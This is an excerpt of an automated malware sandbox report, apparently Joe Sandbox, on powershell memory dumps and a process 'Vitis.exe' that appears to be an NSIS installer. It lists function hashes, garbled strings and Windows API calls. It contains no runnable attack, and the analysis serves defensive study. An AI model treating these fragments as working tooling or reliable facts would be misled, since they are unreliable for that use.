Opcode ID: 3f9cb5a15907c81f92f90678fb9ab7ec416e8ff85ec9edefe113c5a41fbb2f60
Instruction ID: 972eab1302ca243c70740d06f3492dd48d7807aab1ca9fbd851eb9c505a55e46
Opcode Fuzzy Hash: 3f9cb5a15907c81f92f90678fb9ab7ec416e8ff85ec9edefe113c5a41fbb2f60
Instruction Fuzzy Hash: B1C19831A00208CFCB55DBE4D844AADBBB6FF85310F218569E406AF765CB35ED89CB81

Uniqueness

Uniqueness Score: -1.00%

Function 069EF3ED Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fa39733f3ca4bbd4f818ad7b09a55303b01ed538f9cdf0c890c378d641ea941
Instruction ID: a8e65b70913d78038e59f1e0390c3ef8104f186f0463c1c33b14a651324ad866
Opcode Fuzzy Hash: 5fa39733f3ca4bbd4f818ad7b09a55303b01ed538f9cdf0c890c378d641ea941
Instruction Fuzzy Hash: 9FB17C70E002098FDF51CFA8D9857EDBBF5AF88314F24812AD819E7694EB749846CF81

Uniqueness

Uniqueness Score: -1.00%

Function 069E7A68 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c133ec7f134ff67b32183429086d2b6b865bc0bd8917eaa41a7c3ef1526b3540
Instruction ID: ed470a09d85d9a4b4ce3f8c3ab0e6894427bb195f0a8c75c7f5902049b209dd8
Opcode Fuzzy Hash: c133ec7f134ff67b32183429086d2b6b865bc0bd8917eaa41a7c3ef1526b3540
Instruction Fuzzy Hash: 71719D30A00209CFCB15DFA8C880A9DBBF6FF85314F28896AD415DB761DB75AC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 069E7BD6 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6763456534480b798c2fd38a4785d25b6ce75a166b2f23dcbde045f4a22ba9d
Instruction ID: 9bfe07e1bb6eb0462fef9d85630d3a586aad793b1c68d3876f254744ae59b347
Opcode Fuzzy Hash: e6763456534480b798c2fd38a4785d25b6ce75a166b2f23dcbde045f4a22ba9d
Instruction Fuzzy Hash: 8F713970E00208DFDB55DFA5D454AADBBF6FF88304F248429D416ABBA0DB74AD86CB41

Uniqueness

Uniqueness Score: -1.00%

Function 069E77F9 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c7822530d04e93d3e6956d68aaa9062cc64a01262a32aa03678ee94af006c19
Instruction ID: 19130f093e7a2c559d950c2819e52ff877350f4b8016a1014f2982a0272c841e
Opcode Fuzzy Hash: 9c7822530d04e93d3e6956d68aaa9062cc64a01262a32aa03678ee94af006c19
Instruction Fuzzy Hash: 65417F31A00204CFDB56DF74C954AAE7BB6EF89350F145868E406EB7A0CB35ED41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 069E7A53 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3a68a9dc58bad6eb4ad6c2159d30edaba617f142a55b84ba40cecaa7287590a
Instruction ID: df61407267daf18a2021e3f755e67e6bc139dc88701aa34f2f88ff974ae23e24
Opcode Fuzzy Hash: e3a68a9dc58bad6eb4ad6c2159d30edaba617f142a55b84ba40cecaa7287590a
Instruction Fuzzy Hash: 0A417B70E00208CFDB55DFA9C8446EDBBB2FF89304F148869D005ABBA0DB74AD45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 069EB0EF Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe433b847f22de47aea44de84c46ceef082e6595ebb98cc40d34029946b00062
Instruction ID: b381373abfc4bef89751ff0147a19c9974b3a84c2845c7865a92b3fe619e8325
Opcode Fuzzy Hash: fe433b847f22de47aea44de84c46ceef082e6595ebb98cc40d34029946b00062
Instruction Fuzzy Hash: 5651D834A00209EFDB45DFA8D584A9DFBB6FF88310F248559E404AB765C772ED86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 069E2BB0 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c12710b13546152c0cb07ecfe1d3878362de14d00a468cacbc9846f73648f1
Instruction ID: e6828a3dbe90a0fe62e47442d8a893b2cd63ed87c1ffcfbe3bea6a06b1d8e31f
Opcode Fuzzy Hash: e8c12710b13546152c0cb07ecfe1d3878362de14d00a468cacbc9846f73648f1
Instruction Fuzzy Hash: 74414BB4A001098FCB06CF58C594DAAFBB5FF48310B25819AD915AB764C736FD91CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07385BA0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d62754f20178771282af7f1bc736850d52b589a8598fd3d0e938a12a6bef978b
Instruction ID: a2024da642ae859135e77088759fdccb1fe6a9f9b192f27cf5118518badca3fc
Opcode Fuzzy Hash: d62754f20178771282af7f1bc736850d52b589a8598fd3d0e938a12a6bef978b
Instruction Fuzzy Hash: 0F31E570741204AFE704ABB5C851FAE7AA3AFC5314F508428E9056F795CE76DC458BE1

Uniqueness

Uniqueness Score: -1.00%

Function 073813E8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb720cf80a7e1d4e4cb57d609997a182c41910c97a906a4eda8247cddcc34561
Instruction ID: e844afe7e92c73b8ccb3aaa0657a7977844af9cfda4a4efa9b2bca1b27734890
Opcode Fuzzy Hash: cb720cf80a7e1d4e4cb57d609997a182c41910c97a906a4eda8247cddcc34561
Instruction Fuzzy Hash: E32161F170032D67EBA4A9BA8800B37A6E65FC4715F28C42DD50DCF785DD75C8468361

Uniqueness

Uniqueness Score: -1.00%

Function 069EC5C0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 130114968aab7758f81175afaa50b48d317f9c742e894911c4e971a0616c5bdd
Instruction ID: 0fde747b0db981553b156aada7127d7f356e7c1ee76ef7eb280e76118d47ec52
Opcode Fuzzy Hash: 130114968aab7758f81175afaa50b48d317f9c742e894911c4e971a0616c5bdd
Instruction Fuzzy Hash: D1311730A00228CFCB66DB64C8916EEB7F6BF89304F1044E9D51AAB355DB359E85CF81

Uniqueness

Uniqueness Score: -1.00%

Function 073813CC Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e65d5740b7bf852cf4a8125ab1ebce3368438b6f2ab90990b836d1f9ba30f394
Instruction ID: 7652856cdd21aa17a5d9c5e5472c43709ceceb7995f716f898d5a45a3ffe9ad7
Opcode Fuzzy Hash: e65d5740b7bf852cf4a8125ab1ebce3368438b6f2ab90990b836d1f9ba30f394
Instruction Fuzzy Hash: 4B219AF170436D6BEB605AB688107B27FB69FC6310F1C845ED44C8F286E574988A8362

Uniqueness

Uniqueness Score: -1.00%

Function 069EADD8 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4fd80f6f713ad257b248a494d09f2119f51efc1504b1c73bd55d28d2debd029
Instruction ID: aada3435dd523b43cffe097a796ddea4a96ade957de91e20246ede38cfb1c966
Opcode Fuzzy Hash: e4fd80f6f713ad257b248a494d09f2119f51efc1504b1c73bd55d28d2debd029
Instruction Fuzzy Hash: 14314574A006059FCB15CF58C9849AAFBB1FF88320B258699D819EB765C336EC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 073811D8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3963c52788a2b79d1ba61e84aba980e1065dfa490d0d46e4b3e728646999a5a
Instruction ID: d00cd176a06c6dd311f3ab07b63bd642a1ed415416a8c484a05ace72ae117e16
Opcode Fuzzy Hash: a3963c52788a2b79d1ba61e84aba980e1065dfa490d0d46e4b3e728646999a5a
Instruction Fuzzy Hash: E101477631031ECBE76065AAE40057AF7D99BC6222F14C43ED44DCB210CA32C846C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 069EB1FC Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd75a944f32430db38d77bb77e5740f9f1cd38169e2c6e1a250d93d1a1bd887a
Instruction ID: 2f9323637b0fcec65a58c7154c6ac8de8eeb1a077fa42a102b561b72cfcce701
Opcode Fuzzy Hash: cd75a944f32430db38d77bb77e5740f9f1cd38169e2c6e1a250d93d1a1bd887a
Instruction Fuzzy Hash: CF11EF35900209EFDB46CF98D984A9DFBB2FF48324F288559E404AB365C771ED85CB80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 069E7118 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ed33692a851f537240c7e9ebe7ca939d3791913020527eafbc8775baf6beb97
Instruction ID: 16bcc1b1136d9bd342d532c2e1c9ebc54e859d3f7f3e45d7accfa6f07ee3428b
Opcode Fuzzy Hash: 6ed33692a851f537240c7e9ebe7ca939d3791913020527eafbc8775baf6beb97
Instruction Fuzzy Hash: FD2178747006198FCB54DB79C9848AEBBF6FF8A20475045A9E446CBB71DB70ED08CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 07387870 Relevance: 12.8, Strings: 10, Instructions: 309COMMON

Download Yara Rule

Strings

$^q, xrefs: 073878CD
tP^q, xrefs: 0738796B
4'^q, xrefs: 07387B74
$^q, xrefs: 073879E6
4'^q, xrefs: 07387B7E
$^q, xrefs: 073878E9
tP^q, xrefs: 07387977
$^q, xrefs: 073879F6
4'^q, xrefs: 07387A27
4'^q, xrefs: 07387A1B

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
API String ID: 0-788909730
Opcode ID: bde13b7679fecc375eb4e029aa49aab2c51edd005a221bc41b85901e16988636
Instruction ID: a596a6a0cd35a99569bdd86a8e4f0644e4162eb88544525297639607e395d559
Opcode Fuzzy Hash: bde13b7679fecc375eb4e029aa49aab2c51edd005a221bc41b85901e16988636
Instruction Fuzzy Hash: 41A149B1B003099FEB65AAB9C8006AABBE7AFC5310F34C46AD4198F754DF31D945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0738E6E8 Relevance: 9.0, Strings: 7, Instructions: 267COMMON

Download Yara Rule

Strings

tP^q, xrefs: 0738E765
4'^q, xrefs: 0738E94F
$^q, xrefs: 0738E6FA
$^q, xrefs: 0738E720
$^q, xrefs: 0738E72C
tP^q, xrefs: 0738E771
4'^q, xrefs: 0738E959

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-1608119003
Opcode ID: 8f229f4e6fbc4044aeabb394d70bf02f3505ec853889100c512c2d3fd3887d5c
Instruction ID: 2db9d83d43cc08f1670b5b3f8d79dc749549fc485f2e1ac476ed7118282919a1
Opcode Fuzzy Hash: 8f229f4e6fbc4044aeabb394d70bf02f3505ec853889100c512c2d3fd3887d5c
Instruction Fuzzy Hash: E381ACB27403168FF7A4AB79881026ABBE5AFC2710F14846AE449CF791DF35CC45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07388610 Relevance: 7.7, Strings: 6, Instructions: 215COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0738873B
$^q, xrefs: 07388826
4'^q, xrefs: 0738872F
$^q, xrefs: 07388711
$^q, xrefs: 073886B6
$^q, xrefs: 07388701

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
API String ID: 0-3669853574
Opcode ID: a05faa097a06aa93c7ddd86174458c0ff8301c6ffd3171ae3da944042f2a6547
Instruction ID: f530eb3fee03248d92a1aa39190ecc15e8093ae12698a998d1d5a13c731d0a96
Opcode Fuzzy Hash: a05faa097a06aa93c7ddd86174458c0ff8301c6ffd3171ae3da944042f2a6547
Instruction Fuzzy Hash: A86148B472030ADFEBA5AE29C8046EABBB5AF81310F54C47AE54D8F655DB31C885C790

Uniqueness

Uniqueness Score: -1.00%

Function 0738BBBD Relevance: 7.7, Strings: 6, Instructions: 194COMMON

Download Yara Rule

Strings

tP^q, xrefs: 0738BCA8
XRcq, xrefs: 0738BD3D
XRcq, xrefs: 0738BBF9
tP^q, xrefs: 0738BC9C
$^q, xrefs: 0738BC15
XRcq, xrefs: 0738BD2D

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID: XRcq$XRcq$XRcq$tP^q$tP^q$$^q
API String ID: 0-1682816917
Opcode ID: 9ad1708b8fc05cf6918ca42abb6894fe9596b40d33eb7b085f63f20e8e0fa37f
Instruction ID: d3e96a424c53499c2235cfa4ab41b9cad5a6ce7cb8cca7da30b92324457ca9f4
Opcode Fuzzy Hash: 9ad1708b8fc05cf6918ca42abb6894fe9596b40d33eb7b085f63f20e8e0fa37f
Instruction Fuzzy Hash: F461F6F170030B9FEB64AF698440A6AFBB6AF85310F24C469E4499F395CB31D945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0738B24E Relevance: 6.5, Strings: 5, Instructions: 204COMMON

Download Yara Rule

Strings

$^q, xrefs: 0738B2AB
tP^q, xrefs: 0738B369
tP^q, xrefs: 0738B35D
4'^q, xrefs: 0738B438
4'^q, xrefs: 0738B444

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q
API String ID: 0-2369969929
Opcode ID: 54aa7830d657884d66f21befd63c715d0430597b9c42cdce966106dd318a1b89
Instruction ID: 2bea16558dfbbd3d78950834c63b413066813979ca531dc16ece62d77ae37536
Opcode Fuzzy Hash: 54aa7830d657884d66f21befd63c715d0430597b9c42cdce966106dd318a1b89
Instruction Fuzzy Hash: 236138F070031BDFEB54AF64C40166EBBA2BF85310F148469E8095B691CB32DD51C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07380470 Relevance: 6.4, Strings: 5, Instructions: 150COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0738055E
4'^q, xrefs: 0738056A
$^q, xrefs: 07380535
$^q, xrefs: 073804FC
$^q, xrefs: 07380541

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: cfc4c11292ca0b362ff2c7326ffdf5e57a1f651de247b229200f7d701797f373
Instruction ID: 6ce2608d6becba77a655935535235da2dd581dd2536b61f643a655a91479cfe8
Opcode Fuzzy Hash: cfc4c11292ca0b362ff2c7326ffdf5e57a1f651de247b229200f7d701797f373
Instruction Fuzzy Hash: BA413AF1B083159FEB69AA7488106AE7FA59FC2310F14446AD809CF291DF31C94DC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 073820F8 Relevance: 6.4, Strings: 5, Instructions: 148COMMON

Download Yara Rule

Strings

$^q, xrefs: 0738230D
tP^q, xrefs: 07382250
4'^q, xrefs: 0738233D
$^q, xrefs: 073821C9
$^q, xrefs: 073821AD

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q$$^q$$^q$$^q
API String ID: 0-3997570045
Opcode ID: 8473b2295cc66b410a0a18c3a38ba4ccc094321c32acf4ad8aeba3f34033baf9
Instruction ID: 3dd553385d7327ee337251bc1ec0f93f8f93fa00dddde398a27fd559b2d74201
Opcode Fuzzy Hash: 8473b2295cc66b410a0a18c3a38ba4ccc094321c32acf4ad8aeba3f34033baf9
Instruction Fuzzy Hash: 5251B1F0A0030ADFEBA4AE55C944BABB7F6BB85711F18C455E80D9B290C772DC44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0738AD35 Relevance: 6.4, Strings: 5, Instructions: 115COMMON

Download Yara Rule

Strings

$^q, xrefs: 0738ADC5
4'^q, xrefs: 0738ADFD
4'^q, xrefs: 0738ADF1
$^q, xrefs: 0738AD8B
$^q, xrefs: 0738ADD1

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: d8860820e30a0e1354866870550562c1aaf2aaae9c4b755c457bd72d064eafbb
Instruction ID: eb077c3437e8f169c8ae6fbe35d7a0d412534c627303596083885fb9dadaf2dc
Opcode Fuzzy Hash: d8860820e30a0e1354866870550562c1aaf2aaae9c4b755c457bd72d064eafbb
Instruction Fuzzy Hash: DB316BF370430A8FFBA96A6584607B6B7E9AFC5612B24C87BC44ACB245DE31C489C751

Uniqueness

Uniqueness Score: -1.00%

Function 07387866 Relevance: 6.4, Strings: 5, Instructions: 110COMMON

Download Yara Rule

Strings

$^q, xrefs: 073878CD
tP^q, xrefs: 0738796B
$^q, xrefs: 073879E6
$^q, xrefs: 073878E9
4'^q, xrefs: 07387A1B

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q$$^q$$^q$$^q
API String ID: 0-3997570045
Opcode ID: a4a0acca32bf53a59436a5c540b2fea127de72a7ab122cc70962f8573d8ed98a
Instruction ID: 838e661c648baaabf5a1f960c64a30007ac3aca9b10bb720d249fe64f42fa58f
Opcode Fuzzy Hash: a4a0acca32bf53a59436a5c540b2fea127de72a7ab122cc70962f8573d8ed98a
Instruction Fuzzy Hash: 424116F0A10306DFFBA4AEA4C445BA9B7E3AB45720F38C4AAD41D5F290C735D945CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0738CFB7 Relevance: 6.3, Strings: 5, Instructions: 84COMMON

Download Yara Rule

Strings

$^q, xrefs: 0738D018
$^q, xrefs: 0738CFFC
tP^q, xrefs: 0738D07C
$^q, xrefs: 0738D037
$^q, xrefs: 0738CFE0

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$$^q$$^q$$^q$$^q
API String ID: 0-324510305
Opcode ID: 9404df8cf7268445cba875b3fb161cf1d788a8f162237124180f96049e0096ba
Instruction ID: a7221be3200edc81b2b61871977c1d7d3f3aab3bba84196dfe9e73be977a5a6c
Opcode Fuzzy Hash: 9404df8cf7268445cba875b3fb161cf1d788a8f162237124180f96049e0096ba
Instruction Fuzzy Hash: 252126F2B213059FEB64AE65C804E65BBF4AF89610F14409BE9189F292CA31DD45C763

Uniqueness

Uniqueness Score: -1.00%

Function 073888C8 Relevance: 5.5, Strings: 4, Instructions: 487COMMON

Download Yara Rule

Strings

(o^q, xrefs: 073889AE
(o^q, xrefs: 07388CF1
(o^q, xrefs: 073889BE
(o^q, xrefs: 07388D01

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q
API String ID: 0-1978863864
Opcode ID: 721460515624d396424e7d92c7c075a8583f8c8296f4746927e3932a1541d112
Instruction ID: aef24994b2e76e69ef7d4b2ea73684ac64055ad5a030f7aaba945fd03883fffd
Opcode Fuzzy Hash: 721460515624d396424e7d92c7c075a8583f8c8296f4746927e3932a1541d112
Instruction Fuzzy Hash: 54F157B1724306DFEB55AF68C800BEABBA6EFC1310F54846AE449CF291DB35D845C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07389016 Relevance: 5.4, Strings: 4, Instructions: 355COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0738938C
4'^q, xrefs: 07389380
4'^q, xrefs: 073892FD
4'^q, xrefs: 07389309

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: b63638e75852c06cc47f239edc754557c28e0d2f1c565a2d4091bb388c8197cd
Instruction ID: eb68f393d508a103935a6cf5326cec757c0abeec36f08b8c6d2f19f9a0b427a8
Opcode Fuzzy Hash: b63638e75852c06cc47f239edc754557c28e0d2f1c565a2d4091bb388c8197cd
Instruction Fuzzy Hash: 5FF19EB0A00219DFDB54DB54C894B9EBBB2BF88304F1085A9E4096F795CB76ED85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 07387C44 Relevance: 5.1, Strings: 4, Instructions: 81COMMON

Download Yara Rule

Strings

$^q, xrefs: 07387CFB
$^q, xrefs: 07387D17
$^q, xrefs: 07387CB7
$^q, xrefs: 07387CD3

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: dfd2e70e99f15c25c97591723dc9e4c87755d472c2f2e413ca43661a1a3f2a65
Instruction ID: 95fe9c1fe883733dd1a7d2ecd4bd6ec9f63983bd605d14ba87b303098d6c437c
Opcode Fuzzy Hash: dfd2e70e99f15c25c97591723dc9e4c87755d472c2f2e413ca43661a1a3f2a65
Instruction Fuzzy Hash: 9221E5F291430B9BEBB5AEE5C4403B6BBF6AF81220F38446AC44C9B106D731D44DC751

Uniqueness

Uniqueness Score: -1.00%

Function 07380308 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07380373
$^q, xrefs: 0738035E
4'^q, xrefs: 0738037F
$^q, xrefs: 07380352

Memory Dump Source

Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7380000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 239cd297f4fa1ee36283e7614c750a55053e15ac7c5b1e78194e2de7d5ff2f18
Instruction ID: 02d60bf82e56c70f8a606231a24e6a24166c4688acd54b0f4be5b9007e914351
Opcode Fuzzy Hash: 239cd297f4fa1ee36283e7614c750a55053e15ac7c5b1e78194e2de7d5ff2f18
Instruction Fuzzy Hash: AA018460A0A3C69FD76B2278582025A6FF65FC3900B1A45DBD084DF29BCD658C4D8367

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Vitis.exePID: 7512, Parent PID: 7108COMMON

Non-executed Functions

Function 004034F7 Relevance: 75.7, APIs: 33, Strings: 10, Instructions: 450stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008001), ref: 0040351A
GetVersionExW.KERNEL32(?), ref: 00403543
GetVersionExW.KERNEL32(0000011C), ref: 0040355A
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
#17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
OleInitialize.OLE32(00000000), ref: 00403634
SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
CharNextW.USER32(00000000,00435000,00000020,00435000,00000000), ref: 004036A0
GetTempPathW.KERNEL32(00000400,00437800,00000000,?), ref: 004037D3
GetWindowsDirectoryW.KERNEL32(00437800,000003FB), ref: 004037E4
lstrcatW.KERNEL32(00437800,\Temp), ref: 004037F0
GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp), ref: 00403804
lstrcatW.KERNEL32(00437800,Low), ref: 0040380C
SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low), ref: 0040381D
SetEnvironmentVariableW.KERNEL32(TMP,00437800), ref: 00403825
DeleteFileW.KERNEL32(00437000), ref: 00403839
lstrcatW.KERNEL32(00437800,~nsu), ref: 00403920
lstrcatW.KERNEL32(00437800,0040A26C), ref: 0040392F

Part of subcall function 00405AB5: CreateDirectoryW.KERNEL32(?,00000000,004034EA,00437800,00437800,00437800,00437800,00437800,004037DA), ref: 00405ABB

